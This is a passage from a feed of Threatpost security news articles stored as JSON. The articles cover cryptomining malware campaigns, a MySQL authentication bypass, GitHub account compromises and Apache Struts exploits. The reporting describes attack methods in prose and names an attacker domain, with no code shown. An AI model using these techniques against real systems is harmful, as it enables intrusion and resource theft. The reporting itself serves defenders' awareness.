MassMiner may have loftier goals than simply cryptomining. On the EternalBlue front, it uses the exploit to drop the [DoublePulsar](<https://threatpost.com/nsas-doublepulsar-kernel-exploit-in-use-internet-wide/125165/>) Windows kernel attack, which is a sophisticated memory-based payload that hooks onto x86 and 64-bit systems and allows an attacker to execute any raw shellcode payload they wish, giving them full control over the system.\n\nMassMiner also uses EternalBlue to install [Gh0st RAT](<https://threatpost.com/eternalblue-exploit-spreading-gh0st-rat-nitol/126052/>), a trojan backdoor for persistence that has targeted the Windows platform for years. It was once primarily a nation-state tool used in APT espionage attacks against government agencies, activists and other political targets, until the EternalBlue exploit was used to spread it in other contexts last year.\n\nIncidentally, this is not the only cryptomining malware to make use of the ShadowBrokers\u2019 [release](<https://threatpost.com/shadowbrokers-remain-an-enigma/127072/>) of a trove of NSA exploits. Last week, [a malware called PyRoMine](<https://threatpost.com/pyromine-uses-nsa-exploit-for-monero-mining-and-backdoors/131472/>) that uses the EternalRomance tool was found in the wild mining Monero. Like MassMiner, it has far-ranging and concerning capabilities: It sets up a hidden default account on the victimized machine with system administrator privileges, which can be used for re-infection and further attacks.\n\nThe multi-pronged approach may be unusual, but it showcases the increasingly complex task that businesses have in front of them when it comes to their security postures.\n\n\u201cThe enterprise attack surface is hyper-dimensional and constantly increasing with hundreds of attack vectors. Enterprises continue to struggle with not just mapping their attack surfaces, but also identifying which systems are easiest to attack and can be used as a launch point for a breach,\u201d said Mishra.\n", "cvss3": {}, "published": "2018-05-03T20:26:37", "type": "threatpost", "title": "MassMiner Takes a Kitchen-Sink Approach to Cryptomining", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-0143", "CVE-2017-10271", "CVE-2017-5638"], "modified": "2018-05-03T20:26:37", "id": "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "href": "https://threatpost.com/massminer-takes-a-kitchen-sink-approach-to-cryptomining/131687/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-01-28T21:55:45", "description": "Researchers have identified an updated malware variant used by the cybercrime gang Rocke Group that targets cloud infrastructures with crypto-jacking attacks.\n\nThe malware is called Pro-Ocean, which was first discovered in 2019, and has now been beefed-up with \u201cworm\u201d capabilities and rootkit detection-evasion features.\n\n\u201cThis malware is an example that demonstrates that cloud providers\u2019 agent-based security solutions may not be enough to prevent evasive malware targeted at public cloud infrastructure,\u201d said Aviv Sasson with Palo Alto Networks [on Thursday](<https://unit42.paloaltonetworks.com/pro-ocean-rocke-groups-new-cryptojacking-malware/>). \u201cAs we saw, this sample has the capability to delete some cloud providers\u2019 agents and evade their detection.\u201d\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nSince [its discovery in 2018](<https://threatpost.com/new-threat-actor-rocke-a-rising-monero-cryptomining-menace/137090/>), the Rocke Group has widened its [targeting of cloud applications](<https://threatpost.com/cryptomining-malware-uninstalls-cloud-security-products/140959/>) \u2013 including Apache ActiveMQ, Oracle WebLogic and open-source data structure store Redis \u2013 for mining Monero. Researchers say that since these attacks initially broke out, many cybersecurity companies have kept Pro-Ocean on their radar. Rocke Group\u2019s latest update aims to sidestep these detection and mitigation efforts.\n\n## **Pro-Ocean Malware**\n\nPro-Ocean uses a variety of known vulnerabilities to target cloud applications. These include a [critical flaw in Apache ActiveMQ](<https://nvd.nist.gov/vuln/detail/CVE-2016-3088>) (CVE-2016-3088) and [a high-severity vulnerability](<https://nvd.nist.gov/vuln/detail/CVE-2017-10271>) in Oracle WebLogic (CVE-2017-10271). The malware has also been spotted targeting unsecure instances of Redis.\n\nOnce downloaded, the malware attempts to remove other malware and cryptominers, including [Luoxk](<https://blog.netlab.360.com/malicious-campaign-luoxk-is-actively-exploiting-cve-2018-2893/>), [BillGates](<https://www.akamai.com/us/en/multimedia/documents/state-of-the-internet/bill-gates-botnet-threat-advisory.pdf>), [XMRig](<https://threatpost.com/new-cryptominer-distributes-xmrig-in-aggressive-attacks/132027/>) and [Hashfish](<https://virus-removal-guide.net/34710-is-the-hashfish-exe-file-legal-how-to-remove-hashfish-exe-trojan-coinminer/>). It then kills any processes using the CPU heavily, so that its XMRig miner can utilize 100 percent of the CPU juice needed to sow Monero.\n\nThe malware is made up of four components: A rootkit module that installs a rootkit and other various malicious services; a mining module that runs the XMRig miner; a Watchdog module that executes two Bash scripts (these check that the malware is running and search any processes using CPU heavily); and an infection module that contains \u201cworm\u201d capabilities.\n\n## **New Features**\n\nThe latter \u201cworm\u201d feature is a new add for Pro-Ocean, which previously only infected victims manually. The malware now uses a Python infection script to retrieve the public IP address of the victim\u2019s machine. It does so by accessing an online service with the address \u201cident.me,\u201d which scopes out IP addresses for various web servers. Then, the script tries to infect all the machines in the same 16-bit subnet (e.g. 10.0.X.X).\n\n\u201cIt does this by blindly executing public exploits one after the other in the hope of finding unpatched software it can exploit,\u201d said Sasson.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/01/28143636/word-image-4.png>)\n\nPro-Ocean\u2019s modular structure. Credit: Palo Alto Networks\n\nOther threat groups have previously adopted worm-like functionality into their Monero-chugging malware. TeamTNT\u2019s cryptomining worm, for instance, [was found spreading through](<https://threatpost.com/aws-cryptojacking-worm-cloud/158427/>) the Amazon Web Services (AWS) cloud and collecting credentials in August.\n\nThe Pro-Ocean malware has also added mew rootkit capabilities that cloak its malicious activity.\n\nThese updated features exist in [Libprocesshider](<https://github.com/gianlucaborello/libprocesshider>), a library for hiding processes used by the malware. This library was utilized by previous versions of Pro-Ocean \u2013 however, in the new version, the developer of the code has added several new code snippets to the library for further functionalities.\n\nFor example, before calling the libc function open (libc is a library of standard functions that can be used by all C programs), a malicious function determines whether the file needs to be hidden to obfuscate malicious activities.\n\n\u201cIf it determines that the file needs to be hidden, the malicious function will return a \u2018No such file or directory\u2019 error, as if the file in question does not exist,\u201d said Sasson.\n\nResearchers said they believe that the Rocke Group will continue to actively update its malware, particularly as the [cloud grows as a lucrative target for attackers](<https://threatpost.com/cloud-attacks-bypass-mfa-feds/163056/>).\n\n\u201cCryptojacking malware targeting the cloud is evolving as attackers understand the potential of that environment to mine for crypto coins. We previously saw simpler attacks by the Rocke Group, but it seems this group presents an ongoing, growing threat. This cloud-targeted malware is not something ordinary since it has worm and rootkit capabilities. We can assume that the growing trend of sophisticated attacks on the cloud will continue.\u201d\n\n**Download our exclusive **[**FREE Threatpost Insider eBook**](<https://threatpost.com/ebooks/healthcare-security-woes-balloon-in-a-covid-era-world/?utm_source=FEATURE&utm_medium=FEATURE&utm_campaign=Nov_eBook>) [_**Healthcare Security Woes Balloon in a Covid-Era World**_](<https://threatpost.com/ebooks/healthcare-security-woes-balloon-in-a-covid-era-world/?utm_source=ART&utm_medium=ART&utm_campaign=Nov_eBook>)** , sponsored by ZeroNorth, to learn more about what these security risks mean for hospitals at the day-to-day level and how healthcare security teams can implement best practices to protect providers and patients. Get the whole story and **[**DOWNLOAD the eBook now**](<https://threatpost.com/ebooks/healthcare-security-woes-balloon-in-a-covid-era-world/?utm_source=ART&utm_medium=ART&utm_campaign=Nov_eBook>)**\u2013 on us!**\n", "cvss3": {}, "published": "2021-01-28T20:06:57", "type": "threatpost", "title": "Rocke Group\u2019s Malware Now Has Worm Capabilities", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2016-3088", "CVE-2017-10271", "CVE-2018-2893"], "modified": "2021-01-28T20:06:57", "id": "THREATPOST:D3FA06D667A0B326C1598C8BCD106E7D", "href": "https://threatpost.com/rocke-groups-malware-now-has-worm-capabilities/163463/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-07-03T05:58:59", "description": "It was only a matter of time before attacks were seen in the wild, and now it\u2019s happened. A known threat actor has mounted a large cryptomining campaign using the recently disclosed Apache Struts 2 critical remote code-execution vulnerability. It uses a new malware designed for persistence and stealth, dubbed CroniX.\n\nThe malware\u2019s snappy name comes from the fact that it uses the Cron tool for persistence and Xhide for launching executables with fake process names, according to researchers at F5 Labs, who analyzed the campaign.\n\nThe Apache Struts 2 namespace vulnerability ([CVE-2018-11776](<https://threatpost.com/apache-struts-2-flaw-uncovered-more-critical-than-equifax-bug/136850/>)) was disclosed just two weeks ago by researchers at Semmle. Researchers have warned that it has the potential to open the door to even more critical havoc than the bug at the root of the [infamous Equifax breach](<https://threatpost.com/equi-facts-equifax-clarifies-the-numbers-for-its-massive-breach/131797/>), which was also an Apache Struts 2 flaw ([CVE-2017-5638](<https://threatpost.com/equifax-confirms-march-struts-vulnerability-behind-breach/127975/>)). That\u2019s quite a statement given that the attack resulted in the exposure of personally identifiable information (PII) of 147 million consumers, costing the Fortune 500 credit-reporting company more than $439 million in damages and leading to the resignation of several of its executives.\n\nThe new campaign makes use of one of the [proof-of-concept exploits](<https://threatpost.com/poc-code-surfaces-to-exploit-apache-struts-2-vulnerability/136921/>) that were published on Github2 and Twitter just days after the latest flaw was publicized. Adversaries are using it to gain unauthenticated remote code-execution capabilities on targeted Linux machines in order to install a [Monero cryptomining script](<https://threatpost.com/?s=monero>), F5 researchers said.\n\n\u201cAs with many other Apache Struts 2 vulnerabilities, CVE-2018-11776 allows attackers to inject Object-Graph Navigation Language (OGNL) expressions, which might contain malicious Java code that is evaluated under several circumstances,\u201d the team explained in [a posting](<https://www.f5.com/labs/articles/threat-intelligence/apache-struts-2-vulnerability--cve-2018-11776--exploited-in-cron>) Tuesday. \u201cThis time, the injection point is within the URL. The attacker sends a single HTTP request while injecting an OGNL expression that, once evaluated, executes shell commands to download and execute a malicious file.\u201d\n\nThey added, \u201cconsidering it\u2019s only been two weeks since this vulnerability was discovered, it\u2019s worth noting how fast attackers are weaponizing vulnerabilities and how quickly researchers are seeing them in the wild.\u201d\n\n**Analysis**\n\nTaking a closer look at the malware, the team saw the malware downloads a file called \u201cH,\u201d which turns out to be an old XHide tool for launching executables with a fake process name, the researchers said. In this case, it launches a fork of the XMRig Monero miner, with an embedded configuration (pool, username and password), while changing the process name to the more innocuous-sounding \u201cjava.\u201d\n\nThe analysts also saw that three Cron jobs are used for persistence, with two of them refreshing the backdoor every day with downloads from the C2 server. Another job downloads a daily file named \u201canacrond,\u201d which saves itself in various Cron job files around the system. In all three cases, the scripts are used to connect to the C2 server and download the deployment bash script to restart the mining process; older versions of the scripts are then deleted off the system.\n\nCroniX also a competitive malware, locating and deleting the binaries of any previously installed cryptominers so as to claim all of the CPU resources for itself, F5 found.\n\n\u201cFor some miners, the attacker decides to take a more careful approach and check each process name and process CPU usage, and then kill only those processes that utilize 60 percent or more of the CPU resources,\u201d F5 researchers said. \u201cThis is probably done to avoid killing legitimate processes as the names of these miners (crond, sshd and syslogs) typically relate to legitimate programs on a Linux system.\u201d\n\nComparing the modus operandi of the operation, F5 researchers believe the actor is the same group that was behind a previous campaign exploiting Jenkins servers via [CVE-2017-1000353](<https://devcentral.f5.com/articles/jenkins-unsafe-deserialization-vulnerability-cve-2017-1000353-30142>). That campaign was uncovered two months ago.\n\n\u201cThe malware deployment pattern\u2026similar deployed file names and the quite unique usage of the XHide process-faker made us believe that the threat actor behind the exploitation of this fresh Struts 2 vulnerability is the same one,\u201d researchers noted in the analysis.\n\nOne difference is that in the previous campaign, the threat actor used a Chinese Git website to host malicious files. Here, the attackers are using a dedicated web server hosted in the U.S., along with domain names designating the Pacific island of Palau (.pw) \u2013 believed registered by a Russian registrant.\n\nWhile cryptomining can be seen as less destructive than [wiper malware,](<https://threatpost.com/secrets-of-the-wiper-inside-the-worlds-most-destructive-malware/131836/>) [ransomware](<https://threatpost.com/apache-struts-2-exploits-installing-cerber-ransomware/124844/>) or Equifax-like [mass data exfiltration](<https://threatpost.com/equifax-says-breach-affects-143-million-americans/127880/>) (all of which can be carried out using this flaw), Jeannie Warner, security manager at WhiteHat Security, noted that exploit development tends to be faster for more widely embedded flaws, highlighting the importance of patching this particular issue immediately.\n\n\u201cApache Struts is used by some of the world\u2019s largest companies,\u201d she said via email. \u201cThe more common the vulnerability, the more it helps attackers simplify their process\u2026and the easier it becomes for non-skilled hackers to compromise more websites. Methods to exploit this newest Struts vulnerability are already available online, so it is absolutely critical that all companies implement the patch immediately. There\u2019s no time to waste.\u201d\n\nMore attacks should be anticipated; in fact, while Linux machines seem to be the target for this particular CroniX effort, the F5 analysis uncovered an additional file lurking on the server that seems tailored to Microsoft\u2019s OS.\n\n\u201c[The file] at /win/checking-test.hta holds a Visual Basic script that calls a Microsoft Windows cmd to run a Powershell command on a targeted victim,\u201d researchers said. \u201cSo, it seems this threat actor is targeting Windows OS (not just Linux) using another operation hosted on the same server.\u201d\n", "cvss3": {}, "published": "2018-09-05T17:48:03", "type": "threatpost", "title": "Active Campaign Exploits Critical Apache Struts 2 Flaw in the Wild", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-1000353", "CVE-2017-5638", "CVE-2018-11776"], "modified": "2018-09-05T17:48:03", "id": "THREATPOST:D70CED5C745CA3779F2D02FBB6DBA717", "href": "https://threatpost.com/active-campaign-exploits-critical-apache-struts-2-flaw-in-the-wild/137207/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-05-13T21:58:43", "description": "The Panda threat group, best known for launching the widespread and successful 2018 [\u201cMassMiner\u201d cryptomining malware](<https://threatpost.com/massminer-takes-a-kitchen-sink-approach-to-cryptomining/131687/>) campaign, has continued to use malware to mine cryptocurrency in more recent attacks. A fresh analysis of the group reveals Panda has adopted a newly-updated infrastructure, payloads and targeting.\n\nWhile considered unsophisticated, researchers warn that the threat group has a wide reach and has attacked organizations in banking, healthcare, transportation and IT services. So far, researchers estimate that Panda has made away with more than $100,000 in Monero \u2013 and with attacks as recently as August 2019, the threat group isn\u2019t ceasing its activities anytime soon, they said.\n\n\u201cPanda\u2019s willingness to persistently exploit vulnerable web applications worldwide, their tools allowing them to traverse throughout networks, and their use of RATs, means that organizations worldwide are at risk of having their system resources misused for mining purposes or worse, such as exfiltration of valuable information,\u201d said Christopher Evans and David Liebenberg with [Cisco\u2019s Talos research team.](<https://blog.talosintelligence.com/2019/09/panda-evolution.html>)\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nResearchers first became aware of Panda in the summer of 2018 after they engaged in a widespread illicit mining campaign called \u201c[MassMiner](<https://threatpost.com/massminer-takes-a-kitchen-sink-approach-to-cryptomining/131687/>).\u201d During that campaign, the threat actor used MassScan, a legitimate port scanner, to sniff out various vulnerabilities in servers to exploit, including a WebLogic vulnerability ([CVE-2017-10271](<https://nvd.nist.gov/vuln/detail/CVE-2017-10271>)) and a remote code execution vulnerability in Apache Struts 2 ([CVE-2017-5638](<https://nvd.nist.gov/vuln/detail/CVE-2017-5638>)).\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/09/17155626/image4.png>)\n\nThe threat group then would exploit the flaws and install malware, which would set about mining for Monero and hooking up with a crypto-wallet and mining pool.\n\nSince then, in 2019, researchers said that the threat group has constantly evolved to update its infrastructure, exploits and payloads.\n\n\u201cShortly thereafter [the 2018 campaign], we linked Panda to another widespread illicit mining campaign with a different set of command and control (C2) servers,\u201d researchers said. \u201cWe believe Panda is a legitimate threat capable of spreading cryptocurrency miners that can use up valuable computing resources and slow down networks and systems.\u201d\n\nPanda has constantly changed the vulnerabilities that it targets over the past year. For instance, in January 2019, Talos researchers saw Panda exploiting a recently-disclosed vulnerability in the ThinkPHP web framework (CNVD-2018-24942). And in June 2019, Panda began to target a newer WebLogic vulnerability (CVE-2019-2725) and leveraging an updated payload with new features to download a secondary miner payload.\n\nIn the most recent campaigns, including one which took place in August 2019, Panda began employing a different set of command-and-control (C2) servers as well as a new payload-hosting infrastructure.\n\nIn March 2019, for instance, researchers observed the actor leveraging new infrastructure, including various subdomains of the domain hognoob[.]se. And in August, researchers said they observed several attacker IPs, post-exploit, pulling down payloads from a newer URL and saving the file as \u201cBBBBB\u201d (a slight departure from previous behavior, when the file was saved under a random 20-character name). Panda would then execute the file via PowerShell.\n\nPanda has changed up its payload over the summer as well, so that it\u2019s initial payload now uses the Certutil command-line utility \u2013 which can be used to obtain certificate authority information and configure Certificate Services \u2013 to download the secondary miner payload.\n\nThough the threat actor has swapped up its payloads, targeting and infrastructure, very little of its TTPs [tactics, techniques and procures] are sophisticated, Cisco\u2019s Evans told Threatpost.\n\nFor instance, \u201cThey attempt to hide their miners using the exact same popular techniques we see with other groups,\u201d he told Threatpost. \u201cTheir infrastructure is predictable: I can usually peg a new Panda domain as soon as I see it in the data; they tend to just be iterations of each other. Their early infrastructure was registered using an email address that immediately allowed Dave to pivot into their social media in China. They attack the same honeypots day after day with the same payloads. They don\u2019t even bother to confirm their victims are running a vulnerable system before they deliver an exploit.\u201d\n\nBetween swapping up its tactics, domains and payloads, researchers said that Panda has now made more than $100,000 through illicit cryptomining \u2013 and moving forward, Panda remains an active threat that system administers should be wary of.\n\n\u201cThere are several ways to detect mining activity but let\u2019s focus on the simple solutions of patching and basic security controls,\u201d Evans told Threatpost. \u201cIf you\u2019re running a web-accessible WebLogic server that has hasn\u2019t been patched against vulnerabilities like CVE-2017-10271, it\u2019s likely they have at least targeted the system for exploitation if not actually dropped a miner on it\u2026 In addition, if you don\u2019t need it open to the Internet, take it off.\u201d\n\n_**Interested in the role of artificial intelligence in cybersecurity, for both offense and defense? Don\u2019t miss our free **_[_**Threatpost webinar**_](<https://register.gotowebinar.com/register/8988544242398214146?source=ART>)_**, AI and Cybersecurity: Tools, Strategy and Advice, with senior editor Tara Seals and a panel of experts. **__**[Click here to register.](<https://register.gotowebinar.com/register/8988544242398214146?source=ART>)**_\n", "cvss3": {}, "published": "2019-09-17T21:04:35", "type": "threatpost", "title": "Panda Threat Group Mines for Monero With Updated Payload, Targets", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-10271", "CVE-2017-5638", "CVE-2019-2725"], "modified": "2019-09-17T21:04:35", "id": "THREATPOST:12E93CDF8BAC1B158CE1737E859FDD80", "href": "https://threatpost.com/panda-threat-group-mines-for-monero-with-updated-payload-targets/148419/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-10-06T23:02:52", "description": "There is a trivially exploitable vulnerability in MySQL that enables an attacker to gain root access to the database server. The bug, which recently was patched, stems from an error in the way that MySQL and MariaDB handle passwords, giving an attacker a chance of getting root access by supplying any password to an affected server.\n\nThe bug was disclosed over the weekend and there is already exploit code available for it in the form of a [Metasploit module](<https://community.rapid7.com/community/metasploit/blog/2012/06/11/cve-2012-2122-a-tragically-comedic-security-flaw-in-mysql>). Security researchers say that the vulnerability is easily exploitable and that it could be useful for attackers for some time to come.\n\nThe security advisory on the [MySQL CVE-2012-2122 vulnerability](<http://seclists.org/oss-sec/2012/q2/493>) says that the database can be compromised by a remote attacker with little time and effort.\n\n\u201cWhen a user connects to MariaDB/MySQL, a token (SHA over a password and a random scramble string) is calculated and compared with the expected value. Because of incorrect casting, it might\u2019ve happened that the token and the expected value were considered equal, even if the memcmp() returned a non-zero value. In this case MySQL/MariaDB would think that the password is correct, even while it is not. Because the protocol uses random strings, the probability of hitting this bug is about 1/256. Which means, if one knows a user name to connect (and \u201croot\u201d almost always exists), she can connect using *any* password by repeating connection attempts. ~300 attempts takes only a fraction of second, so basically account password protection is as good as nonexistent,\u201d the advisory says.\n\nThere is a fix available for the vulnerability and several Linux distributions that include versions of the affected databases already have pushed out patches for it. [HD Moore](<https://community.rapid7.com/community/metasploit/blog/2012/06/11/cve-2012-2122-a-tragically-comedic-security-flaw-in-mysql>), creator of Metasploit, said that the MySQL flaw is a serious problem and should not be taken lightly.\n\n\u201cIf you are approaching this issue from the perspective of a penetration tester, this will be one of the most useful MySQL tricks for some time to come. One feature of Metasploit you should be familiar with is the mysql_hashdump module. This module uses a known username and password to access the master user table of a MySQL server and dump it into a locally-stored \u201cloot\u201d file. This can be easily cracked using a tool like John the Ripper, providing clear-text passwords that may provide further access,\u201d Moore said in a blog post. \n\n\u201cThis evening [Jonathan Cran](<http://twitter.com/jcran>) (CTO of [Pwnie Expres](<http://pwnieexpress.com/>)s and Metasploit contributor) committed a [threaded brute-force module](<https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/mysql/mysql_authbypass_hashdump.rb>) that abuses the authentication bypass flaw to automatically dump the password database. This ensures that even if the authentication bypass vulnerability is fixed, you should still be able to access the database using the cracked password hashes.\u201d\n", "cvss3": {}, "published": "2012-06-11T14:03:23", "type": "threatpost", "title": "Trivial Password Flaw Leaves MySQL Databases Exposed", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2012-2122"], "modified": "2013-04-17T16:32:04", "id": "THREATPOST:CC02EF0B73E678E9A55E495A12D54D63", "href": "https://threatpost.com/trivial-password-flaw-leaves-mysql-databases-exposed-061112/76675/", "cvss": {"score": 5.1, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-10-06T22:55:11", "description": "Github is forcing a password reset on some of its users after it detected a number of successful intrusions into its repositories using credentials compromised in other breaches.\n\n\u201cThis appears to be the result of an attacker using lists of email addresses and passwords from other online services that have been compromised in the past, and trying them on GitHub accounts,\u201d GitHub said in an [advisory](<https://github.com/blog/2190-github-security-update-reused-password-attack>) published Thursday by Shawn Davenport, GitHub VP of security. \u201cWe immediately began investigating, and found that the attacker had been able to log in to a number of GitHub accounts.\u201d\n\nGitHub said it detected late Tuesday unauthorized attempts against a large number of GitHub accounts. It stressed that GitHub itself has not been compromised.\n\nIt warns users that in addition to the exposed credentials, some personal information may have been exposed as well as lists of accessible repositories and organizations.\n\n\u201cIf your account was impacted, we are in the process of contacting you directly with information about how to reset your password and restore access to your account,\u201d GitHub said.\n\nThe source of credentials used to attack GitHub accounts is unknown. ~~A request for comment from GitHub was not returned in time for publication~~ Github declined to comment beyond what is in its advisory.\n\nIn recent weeks, a number of massive online services including Twitter, VerticalScope, LinkedIn, Tumblr, VK.com and others have been informed that login credentials are for sale in bulk on the black market.\n\nAggregator site LeakedSource has been selling access to its database of breached credentials and more than 700 million credentials have been shared with the site.\n\n\u201cOur intentions are to bring data breaches to light no matter how old, inform consumers about what data is out there, inform consumers to use unique passwords and through our business API directly help companies determine if their users are at risk for account hijacking,\u201d LeakedSource told Threatpost.\n\n[VerticalScope](<http://www.verticalscope.com/about-us/security-update.html>), whose technology powers a number of popular online forums, is the most recent victim to come to light. More than 40 million credentials are believe to be implicated, stolen from sites running outdate vBulletin software that fails to implement HTTPS.\n\n\u201cWe believe that any potential breach is limited to usernames, userids, email addresses, ip addresses and encrypted passwords of our community users,\u201d VerticalScope said in its advisory.\n\nThe VerticalScope data was shared with LeakedSource, which analyzed it and said most of the passwords were salted using the outdated MD5 algorithm and easily crackable. LeakedSource published a top 10 list of the most common passwords and an unusual number of jibberish, complex passwords were included (18atcskd2w was used more on more than 91,000 accounts) indicating that they were likely generated by a bot and used to access the various forums.\n\nIn addition to VerticalScope, LeakedSource has analyzed tens of millions of credentials belonging to Twitter, iMesh and users of other large services whose credentials were stolen at some point.\n\nExperts, meanwhile, continue to caution against [password reuse](<https://threatpost.com/no-simple-fix-for-password-reuse/118536/>). As these breaches show, using the same password to access multiple sites is becoming fodder for attackers compromising one site to use that same access at other locations on the Internet.\n\n\u201cWe know that attackers will go for the weakest link and that is any user who reuses their passwords. It\u2019s a major problem,\u201d said Christopher Hadnagy, chief human hacker at security firm Social-Engineer.\n", "cvss3": {}, "published": "2016-06-17T11:01:55", "type": "threatpost", "title": "Breached Credentials Used to Access Github Repositories", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2016-06-28T13:58:36", "id": "THREATPOST:375A1BFC29F5B279C4D5E461D79CE4AA", "href": "https://threatpost.com/breached-credentials-used-to-access-github-repositories/118746/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-10-06T22:59:23", "description": "A Russian security researcher was able to take five low severity OAuth bugs in the coding site Github and string them together to create what he calls a \u201csimple but high severity exploit\u201d that gave him unfettered access to users\u2019 private repositories.\n\nBangkok-based researcher Egor Homakov \u2013 inspired to poke around the site after learning about its [new bug bounty program last month](<http://threatpost.com/github-launches-bug-bounty-program/103974>) \u2013 discussed the bugs in a blog entry [on his site](<http://homakov.blogspot.com/2014/02/how-i-hacked-github-again.html?m=1>) on Friday.\n\nGithub went on to fix the vulnerabilities \u201cin a timely fashion\u201d according to Homakov, who said he received a $4,000 reward, the highest Github has rewarded in the bounty program\u2019s short time, for his work.\n\nThe main problem lies in the site\u2019s Gist OAuth functionality. [Gists](<https://gist.github.com/>) are Pastebin-like repositories on Github that allow coders to share bits and pieces of their work with their contemporaries, and OAuth is an authentication protocol that can allow different entities, be it a web app or a mobile app, varying degrees of access to your account.\n\nThe first vulnerability in Github Homakov noticed was that he could bypass its [redirect_uri](<https://developer.github.com/v3/oauth/#redirect-urls>) validation by imputing a /../ path traversal. A path traversal attack allows access files and directories stored outside the web root folder to be accessed by manipulating the URL. In this case when the browser is redirected, Homakov found that he can control the HTTP parameter and trick it into not fully parsing the URL, letting him redirect to any Gist page he wants.\n\nIn fact Homakov found that whatever the client sent to get an authorization token, the provider would respond with a valid access_token, a vulnerability that could be used to compromise the log-in functionality on any site that uses it.\n\nThis \u2013 the second bug \u2013 could make it easy for an attacker to hijack the authorization code used for the redirect_uri and simply apply the leaked code on real client\u2019s callback to log in under the victim\u2019s account.\n\nHomakov discovered he could leverage both bugs to trick a user into following a link to get Github to leak a code sending request to him. Using something he\u2019s nicknamed an [Evolution of Open Redirect vulnerability](<http://homakov.blogspot.com/2014/01/evolution-of-open-redirect-vulnerability.html>) the code sending request is sent to an image request which Homakov can then use to then log into the victim\u2019s account and secure access to private gists.\n\nGists are static pages and can even allow users to embed their own images, or at least image code. In this situation there\u2019s a certain way the code can point to a suspicious URL and acquire the victim\u2019s code.\n\nOnce in, Homakov found that the client reveals the victim\u2019s actual OAuth access_token to the user agent, something he then was able to take advantage of and use to perform API calls on behalf of the victim.\n\nSince Gist falls under the Github umbrella, Homakov found the client approves any scope it\u2019s asked automatically. That includes allowing it to carry out specially crafted URLs that can leak code, giving him access to private GitHub repositories and Gists, \u201call in stealth-mode,\u201d because the github_token belongs to the Gist client. From here Homakov has the control of the affected Github user and their Gist account.\n\nHomakov is no stranger to rooting out Github bugs; he blogged about a bug involving the way the site pushes [public keys](<http://homakov.blogspot.com/2012/03/how-to.html>) in March 2012 and a problem with the way the site [handles cookies](<http://homakov.blogspot.com/2013/03/hacking-github-with-webkit.html>) last March.\n\nGithub kicked off its bug bounty program just over a week ago by promising to award anywhere from $100 to $5,000 to researchers who discover vulnerabilities in the site or other applications like its API or Gist. As Homakov\u2019s vulnerability involved both Github and Gist and fetched $4,000, it was clearly of concern to the site, with the way the vulnerabilities \u201c[fit so nicely together](<https://twitter.com/homakov/status/431685133570031617>),\u201d impressing Github.\n", "cvss3": {}, "published": "2014-02-11T10:53:58", "type": "threatpost", "title": "Five OAuth Bugs Lead to Github Hack", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2014-02-13T22:01:16", "id": "THREATPOST:1F0994F898084346360FB7C6EFEC201C", "href": "https://threatpost.com/five-oauth-bugs-lead-to-github-hack/104178/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-05-30T05:51:35", "description": "Proof-of-concept code found on the GitHub repository could allow attackers to easily take advantage of a recently identified vulnerability in the Apache Struts 2 framework. The vulnerability ([CVE-2018-11776](<https://access.redhat.com/security/cve/cve-2018-11776>)), [identified earlier this week](<https://threatpost.com/apache-struts-2-flaw-uncovered-more-critical-than-equifax-bug/136850/>), could allow an adversary to execute remote code on targeted systems.\n\nOn Friday, proof-of-concept code was [released](<https://github.com/jas502n/St2-057>) on GitHub along with a [Python script](<https://github.com/pr4jwal/quick-scripts/blob/master/s2-057.py>) that allows for easy exploitation, according to Allan Liska, senior security architect with Recorded Future.\n\n\u201c[We have] also detected chatter in a number of Chinese and Russian underground forums around the exploitation of this vulnerability,\u201d he [wrote in a post](<https://www.recordedfuture.com/apache-struts-vulnerability-github/>).\n\nThe bug, which impacts Apache Struts versions 2.3 to 2.3.34 and 2.5 to 2.5.16, is tied to an improper validation of input data. The Apache Software Foundation [patched](<https://cwiki.apache.org/confluence/display/WW/S2-057>) the vulnerability for all supported versions of Struts 2. Users of Struts 2.3 are advised to upgrade to 2.3.35 and users of Struts 2.5 need to upgrade to 2.5.17.\n\nLiska said the Apache Struts 2 vulnerability is potentially even more damaging than a similar [2017 Apache Struts bug used to exploit Equifax](<https://threatpost.com/patch-released-for-critical-apache-struts-bug/127809/>).\n\n\u201cUnlike that vulnerability, this one does not require any plug-ins to be present in order to exploit it, a simple well-crafted URL is enough to give an attacker access to a victim\u2019s Apache Struts installation and there is already exploit code on Github and underground forums are talking about how to exploit it. The worst part for many large organizations is that they may not even know they are vulnerable because Struts underpins a number of different systems including Oracle and Palo Alto,\u201d Liska said.\n\nThe fact that a patch is available to fix the vulnerability should give cold comfort to companies potentially impacted by the flaw.\n\n\u201cThe Equifax breach happened not because the vulnerability wasn\u2019t fixed, but because Equifax hadn\u2019t yet updated Struts to the latest version. If this is a true working PoC, then any company who hasn\u2019t had the time to update their software, will now be at even greater risk,\u201d said Oege de Moor, chief executive officer at Semmle.\n\nDe Moor said Semmle is not confirming whether the reported PoC is functional.\n\n\u201cIf it is [functioning], attackers now have a quicker way into the enterprise,\u201d de Moor wrote in a prepared statement Friday. \u201cThere is always a time lag between the 